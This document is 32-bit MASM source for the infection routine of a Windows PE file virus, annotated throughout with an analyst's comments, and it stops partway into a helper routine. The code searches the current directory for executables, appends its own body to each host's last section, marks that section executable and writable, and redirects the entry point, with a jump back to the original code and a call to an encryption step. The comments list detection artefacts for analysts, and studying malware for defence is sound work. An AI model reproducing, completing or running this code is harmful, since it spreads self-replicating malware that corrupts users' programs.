; Target: 32-bit Win32, MASM syntax, stdcall (declared by .model below).
; Analyst's reading of this listing: it is the infection body of a PE file
; infector. The code is made position-independent by hand: ebp is set by
; Relocate (not in this excerpt) to the delta between the assembled address
; and the actual load address, and every data/import reference is written as
; [ebp + X] or "offset X / add ebp" for that reason. Labels toOldEntry,
; Display, deccode, virse_end, Relocate, LoadApis and Encrypt are referenced
; but not in this excerpt.
; Artefacts an analyst can key on from the visible code: the dword at
; PE+4Ch (OptionalHeader.Win32VersionValue, normally zero) written as 1 as the
; "already infected" marker, the last section's Characteristics OR'ed with
; 0E0000000h, and the host file growing by exactly virse_end - virse_start
; bytes. At most two files are processed per run (ecx = 02h below).
.386
.model flat,stdcall
.data
.const
.code
start:
virse_start:                            ; first byte of the code that is copied into hosts
;----------------relocation (Relocate computes the ebp delta; not shown)
call Relocate
Prepare:
call LoadApis ;resolve the API addresses read as [ebp + _Xxx] below (LoadApis not shown)
cmp eax,000000000h
jz toOldEntry                           ; API resolution failed -> hand over to the original host entry
mov edx,offset bufDir ;prepare before infection
add edx,ebp
push edx                                ; lpBuffer
push 104h                               ; nBufferLength = 260 (MAX_PATH)
call [ebp + _GetCurrentDirectoryA]
cmp eax,0
jna toOldEntry                          ; 0 = failure
cmp eax,104h
ja toOldEntry                           ; return > buffer size = path did not fit
mov edx,offset bufDir
add edx,ebp
push edx
call [ebp + _SetCurrentDirectoryA]      ; re-applies the directory just read
cmp eax,00000000h
jna toOldEntry
mov ecx,02h ;number of files to infect per run
mov eax,offset win32_find_data
add eax,ebp
push eax                                ; lpFindFileData
mov eax,offset szExe
add eax,ebp
push eax                                ; lpFileName search pattern (contents of szExe not shown)
call [ebp + _FindFirstFileA]
cmp eax,00000000h
jna Display
mov [ebp + hFind],eax
InfectLoop: ;enumerate matching files and infect each one
mov [ebp + nCounte],ecx                 ; park the remaining count; the API calls below do not preserve ecx
jmp InfectFile ;find handle is non-zero: infect this entry
Next:
mov eax,offset win32_find_data
add eax,ebp
push eax
push dword ptr [ebp + hFind]
call [ebp + _FindNextFileA]
cmp eax,00000000h
jna Display                             ; no more files (or error) -> display part
mov ecx,dword ptr [ebp + nCounte]
loop InfectLoop                         ; dec ecx; continue while the per-run quota is not used up
push dword ptr [ebp + hFind]
call [ebp + _FindClose]
jmp Display ;jump to the display part
InfectFile:
mov word ptr [ebp + isExe],00h          ; isExe = 0 until the header checks below pass
mov eax,offset cFileName
add eax,ebp
call CreateF ;open the file (eax = filename; presumably the cFileName member of win32_find_data)
cmp eax,0
jna next                                ; MASM labels are case-insensitive by default: next == Next
mov [ebp + hFile],eax ;save the file handle
Mapping_1:
call FileMapping                        ; first mapping: inspect the headers only
cmp eax,0
jz Next
mov esi,eax                             ; esi = view base (file offset 0)
movzx edx,word ptr [eax]
cmp edx,5a4dh ; check MZ
jnz Exe?
mov eax,dword ptr [esi + 3ch]           ; e_lfanew
add eax,esi ;eax -> PE
mov edx,dword ptr [eax]
cmp edx,00004550h ; check PE
jnz Exe?
mov edx,dword ptr [eax + 4ch]           ; PE+4Ch = OptionalHeader.Win32VersionValue, used as the infection marker
cmp edx,00000001h
jz Exe?                                 ; already marked -> skip this file
mov word ptr [ebp + isExe],0ffffh
add [ebp + dwFileSizeLow],offset virse_end - offset virse_start  ; size the second mapping will use (dwFileSizeLow is filled elsewhere; not shown)
Exe?:
mov eax,esi
call UnmapView
mov eax,[ebp + hMapFile]
call CloseH
cmp word ptr [ebp + isExe],0000h
jz Next                                 ; not a usable PE, or already infected
Mapping_2:
nop
nop
call FileMapping                        ; second mapping, now large enough for the appended code
cmp eax,0
jz Next
mov [ebp + ImageBase],eax               ; "ImageBase" here is the view base address, not the PE ImageBase field
mov esi,dword ptr [eax + 3ch]
add esi,eax ;save PE (esi -> IMAGE_NT_HEADERS)
mov eax,[esi + 28h]                     ; AddressOfEntryPoint
mov [ebp + OldEntry],eax ;save the original EntryPoint RVA
mov eax,esi
add eax,18h                             ; eax -> OptionalHeader
movzx ecx,word ptr [esi + 14h] ;SizeOfOptionalHeader
add eax,ecx                             ; eax -> first IMAGE_SECTION_HEADER
movzx ecx,word ptr [esi + 06h] ;ecx = NumberOfSections
dec ecx                                 ; walk every header except the last
xor ebx,ebx                             ; ebx = running sum of VirtualSize over code sections
f0:
mov edx,dword ptr [eax + 24h]           ; Characteristics
and edx,060000020h
cmp edx,060000020h                      ; CODE | EXECUTE | READ
jnz f1
add ebx,dword ptr [eax + 08h]           ; += VirtualSize
f1:
add eax,28h                             ; sizeof(IMAGE_SECTION_HEADER)
loop f0
mov edi,eax ;save the last section header
push [edi + 08h]                        ; keep the original VirtualSize of the last section
mov eax,[edi + 08h]
add eax,offset virse_end - offset virse_start
mov dword ptr [edi + 08h],eax ;modify VirtualSize
mov ecx,[esi + 3ch]                     ; FileAlignment
call Alignize
mov dword ptr [edi + 10h],eax ;modify SizeOfRawData
mov eax,[edi + 08h]
add eax,[edi + 0ch]                     ; VirtualSize + VirtualAddress
mov ecx,[esi + 38h]                     ; SectionAlignment
call Alignize
mov dword ptr [esi + 50h],eax ;modify SizeOfImage
add ebx,[edi + 08h]                     ; include the (grown) last section in the code sum
mov eax,ebx
mov ecx,[esi + 3ch]
call Alignize
mov dword ptr [esi + 1ch],eax ;modify SizeOfCode
pop eax                                 ; original VirtualSize of the last section
mov ecx,eax                             ; ecx keeps it for the raw-offset computation below
add eax,[edi + 0ch]                     ; RVA just past the old end of the section
add eax,offset deccode - offset virse_start   ; deccode (not shown) is where the copied code is entered
mov dword ptr [esi + 28h],eax ;modify EntryPoint
mov [ebp + NewEntry],eax ;save NewEntry
mov edx ,dword ptr [edi + 24h]
or edx,0E0000000h                       ; last section becomes EXECUTE | READ | WRITE
mov dword ptr [edi + 24h],edx
mov eax,[edi + 14h]                     ; PointerToRawData
add eax,[ebp + ImageBase]
add eax,ecx ;Formal VirtualSize (write position = raw start + old VirtualSize, in the view)
push eax ;Save VirseCode start Address
mov edi,eax
mov esi,virse_start                     ; intended as the address of virse_start; ebp delta added next
add esi,ebp
mov ecx,offset virse_end - offset virse_start
cld
rep movsb                               ; append a copy of virse_start..virse_end to the host's last section
setEntyPoint:
pop edi
push edi
add edi,offset toOldEntry - offset virse_start   ; edi -> the copy's toOldEntry stub
mov eax,000000e9h                       ; jmp rel32 opcode (only al is stored)
stosb
mov eax,[ebp + OldEntry]
mov edx,[ebp + NewEntry]
add edx,offset toOldEntry - offset deccode       ; RVA of the patched jmp inside the host
sub eax,edx
sub eax,05h                             ; rel32 = OldEntry - (jmp RVA + 5)
stosd
SetFlag:
mov eax,[ebp + ImageBase]
mov eax,[eax + 3ch]
add eax,[ebp + ImageBase]
mov dword ptr [eax + 4ch],00000001h     ; write the infection marker that Mapping_1 checks
enc:
pop esi ;VirseCode start Address
call Encrypt                            ; Encrypt is not in this excerpt
Infected:
push ebp                                ; ebp is the relocation delta; keep it across the calls below
mov eax,[ebp + ImageBase]
call UnmapView
mov eax,[ebp + hMapFile]
call CloseH
mov eax,[ebp + hFile]
call CloseH
pop ebp
jmp Next
FileMapping proc ;---------map the already-open file into memory
;-----------------------inputs (read via ebp)
;[ebp + hFile]: open file handle, [ebp + dwFileSizeLow]: size handed to CreateFileMapping
;-----------------------outputs
;eax = view base address and [ebp + hMapFile] set on success
;eax = 0 on failure; the mapping object (if created) and the file handle are closed first
;clobbers: ecx, edx (CreateFM/MapView zero edx); CloseH's clobbers are not shown here
;note: MapView is called with ecx = 0, i.e. the whole mapping is mapped
;-----------------------
mov eax,[ebp + hFile]
mov ecx,[ebp + dwFileSizeLow]
call CreateFM ;create the file mapping object
cmp eax,0
jna ClsF                                ; NULL -> close the file and return 0
mov [ebp + hMapFile],eax
mov ecx,0
call MapView ;map the view
cmp eax,0
jna ClsMf                               ; NULL -> close mapping and file, return 0
ret
ClsMf :
mov eax,[ebp + hMapFile]
call CloseH
ClsF :
mov eax,[ebp + hFile]
call CloseH
xor eax,eax
ret
FileMapping endp
Alignize proc
;------------round up to a multiple of the alignment
;in:  eax = value, ecx = alignment (non-zero)
;out: eax = (eax / ecx + 1) * ecx  -- always advances by at least one unit,
;     even when eax is already a multiple of ecx
;clobbers: edx (zeroed for div, then holds the high dword of the mul)
;--------------------
xor edx,edx                             ; edx:eax / ecx -> unsigned division needs edx cleared
div ecx
inc eax
mul ecx
ret
Alignize endp
CreateF proc ;wrapper for CreateFileA
;----------inputs
;eax = lpFileName
;----------outputs
;eax = file handle returned by CreateFileA
;clobbers: edx (zeroed)
;call made (pushed right to left):
;CreateFileA(lpFileName, 0E0000000h = GENERIC_READ|GENERIC_WRITE|GENERIC_EXECUTE,
;            3 = FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, 3 = OPEN_EXISTING,
;            80h = FILE_ATTRIBUTE_NORMAL, NULL)
;------------------
xor edx,edx
push edx                                ; hTemplateFile
push 00000080h                          ; dwFlagsAndAttributes
push 00000003h                          ; dwCreationDisposition
push edx                                ; lpSecurityAttributes
push 00000003h                          ; dwShareMode
push 0e0000000h                         ; dwDesiredAccess
push eax                                ; lpFileName
call [ebp + _CreateFileA]
ret
CreateF endp
CreateFM proc ;wrapper for CreateFileMapping
;------------inputs
;eax = file handle, ecx = maximum size (low dword); edx is zeroed here and used as NULL
;------------outputs
;eax = mapping handle returned by CreateFileMapping
;clobbers: edx
;call made (pushed right to left):
;CreateFileMapping(hFile, NULL, 4 = PAGE_READWRITE, 0, ecx, NULL)
;------------------
xor edx,edx
push edx                                ; lpName
push ecx                                ; dwMaximumSizeLow
push edx                                ; dwMaximumSizeHigh
push 00000004h                          ; flProtect
push edx                                ; lpAttributes
push eax                                ; hFile
call [ebp + _CreateFileMapping]
ret
CreateFM endp
MapView proc ;wrapper for MapViewOfFile
;-----------inputs
;eax = mapping handle, ecx = number of bytes to map (0 = whole mapping); edx is zeroed here
;-----------outputs
;eax = view base address returned by MapViewOfFile
;clobbers: edx
;call made (pushed right to left):
;MapViewOfFile(hMap, 1Fh = FILE_MAP_ALL_ACCESS, 0, 0, ecx)
;-----------------
xor edx,edx
push ecx                                ; dwNumberOfBytesToMap
push edx                                ; dwFileOffsetLow
push edx                                ; dwFileOffsetHigh
push 0000001fh                          ; dwDesiredAccess
push eax                                ; hFileMappingObject
call [ebp + _MapViewOfFile]
ret
MapView endp
UnmapView proc ;wrapper for UnmapViewOfFile
;----------inputs
;eax = view base address to unmap
;----------outputs
;eax = result of UnmapViewOfFile
;(proc is closed as UnMapView; MASM is case-insensitive by default, so the names match)
;--------------------------
push eax                                ; lpBaseAddress
call [ebp + _UnmapViewOfFile]
ret
UnMapView endp
CloseH proc ;函数 CloseHandle
;----------参数
;eax 句柄